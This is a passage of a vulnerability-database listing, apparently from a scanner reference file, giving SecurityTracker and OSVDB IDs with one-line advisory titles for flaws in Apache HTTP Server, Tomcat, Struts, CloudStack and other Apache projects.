7502| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
7503| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
7504| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
7505| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
7506| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
7507| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
7508| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
7509| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
7510| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
7511| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
7512| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
7513| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
7514| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
7515| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
7516| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
7517| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
7518| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
7519| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
7520| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
7521| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
7522| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
7523| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
7524| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
7525| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
7526| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
7527| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
7528| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
7529| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
7530| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
7531| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
7532| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
7533| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
7534| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
7535| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
7536| [1008920] Apache mod_digest May Validate Replayed Client Responses
7537| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
7538| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
7539| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
7540| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
7541| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
7542| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
7543| [1008030] Apache mod_rewrite Contains a Buffer Overflow
7544| [1008029] Apache mod_alias Contains a Buffer Overflow
7545| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
7546| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
7547| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
7548| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
7549| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
7550| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
7551| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
7552| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
7553| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
7554| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
7555| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
7556| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
7557| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
7558| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
7559| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
7560| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
7561| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
7562| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
7563| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
7564| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
7565| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
7566| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
7567| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
7568| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
7569| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
7570| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
7571| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
7572| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
7573| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
7574| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
7575| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
7576| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
7577| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
7578| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
7579| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
7580| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
7581| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
7582| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
7583| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
7584| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
7585| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
7586| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
7587| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
7588| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
7589| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
7590| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
7591| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
7592| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
7593| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
7594| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
7595| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
7596| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
7597| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
7598| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
7599| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
7600| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
7601|
7602| OSVDB - http://www.osvdb.org:
7603| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
7604| [96077] Apache CloudStack Global Settings Multiple Field XSS
7605| [96076] Apache CloudStack Instances Menu Display Name Field XSS
7606| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
7607| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
7608| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
7609| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
7610| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
7611| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
7612| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
7613| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
7614| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
7615| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
7616| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
7617| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
7618| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
7619| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
7620| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
7621| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
7622| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
7623| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
7624| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
7625| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
7626| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
7627| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
7628| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
7629| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
7630| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
7631| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
7632| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
7633| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
7634| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
7635| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
7636| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
7637| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
7638| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
7639| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
7640| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
7641| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
7642| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
7643| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
7644| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
7645| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
7646| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
7647| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
7648| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
7649| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
7650| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
7651| [94279] Apache Qpid CA Certificate Validation Bypass
7652| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
7653| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
7654| [94042] Apache Axis JAX-WS Java Unspecified Exposure
7655| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
7656| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
7657| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
7658| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
7659| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
7660| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
7661| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
7662| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
7663| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
7664| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
7665| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
7666| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
7667| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
7668| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
7669| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
7670| [93541] Apache Solr json.wrf Callback XSS
7671| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
7672| [93521] Apache jUDDI Security API Token Session Persistence Weakness
7673| [93520] Apache CloudStack Default SSL Key Weakness
7674| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
7675| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
7676| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
7677| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
7678| [93515] Apache HBase table.jsp name Parameter XSS
7679| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
7680| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
7681| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
7682| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
7683| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
7684| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
7685| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
7686| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
7687| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
7688| [93252] Apache Tomcat FORM Authenticator Session Fixation
7689| [93172] Apache Camel camel/endpoints/ Endpoint XSS
7690| [93171] Apache Sling HtmlResponse Error Message XSS
7691| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
7692| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
7693| [93168] Apache Click ErrorReport.java id Parameter XSS
7694| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
7695| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
7696| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
7697| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
7698| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
7699| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
7700| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
7701| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
7702| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
7703| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
7704| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
7705| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
7706| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
7707| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
7708| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
7709| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
7710| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
7711| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
7712| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
7713| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
7714| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
7715| [93144] Apache Solr Admin Command Execution CSRF
7716| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
7717| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
7718| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
7719| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
7720| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
7721| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
7722| [92748] Apache CloudStack VM Console Access Restriction Bypass
7723| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
7724| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
7725| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
7726| [92706] Apache ActiveMQ Debug Log Rendering XSS
7727| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
7728| [92270] Apache Tomcat Unspecified CSRF
7729| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
7730| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
7731| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
7732| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
7733| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
7734| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
7735| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
7736| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
7737| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
7738| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
7739| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
7740| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
7741| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
7742| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
7743| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
7744| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
7745| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
7746| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
7747| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
7748| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
7749| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
7750| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
7751| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
7752| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
7753| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
7754| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
7755| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
7756| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
7757| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
7758| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
7759| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
7760| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
7761| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
7762| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
7763| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
7764| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
7765| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
7766| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
7767| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
7768| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
7769| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
7770| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
7771| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
7772| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
7773| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
7774| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
7775| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
7776| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
7777| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
7778| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
7779| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
7780| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
7781| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
7782| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
7783| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
7784| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
7785| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
7786| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
7787| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
7788| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
7789| [86901] Apache Tomcat Error Message Path Disclosure
7790| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
7791| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
7792| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
7793| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
7794| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
7795| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
7796| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
7797| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
7798| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
7799| [85430] Apache mod_pagespeed Module Unspecified XSS
7800| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
7801| [85249] Apache Wicket Unspecified XSS
7802| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
7803| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
7804| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
7805| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
7806| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
7807| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
7808| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
7809| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
7810| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
7811| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
7812| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
7813| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
7814| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
7815| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
7816| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
7817| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
7818| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
7819| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
7820| [83339] Apache Roller Blogger Roll Unspecified XSS
7821| [83270] Apache Roller Unspecified Admin Action CSRF
7822| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
7823| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
7824| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
7825| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
7826| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
7827| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
7828| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
7829| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
7830| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
7831| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
7832| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
7833| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
7834| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
7835| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
7836| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
7837| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
7838| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
7839| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
7840| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
7841| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
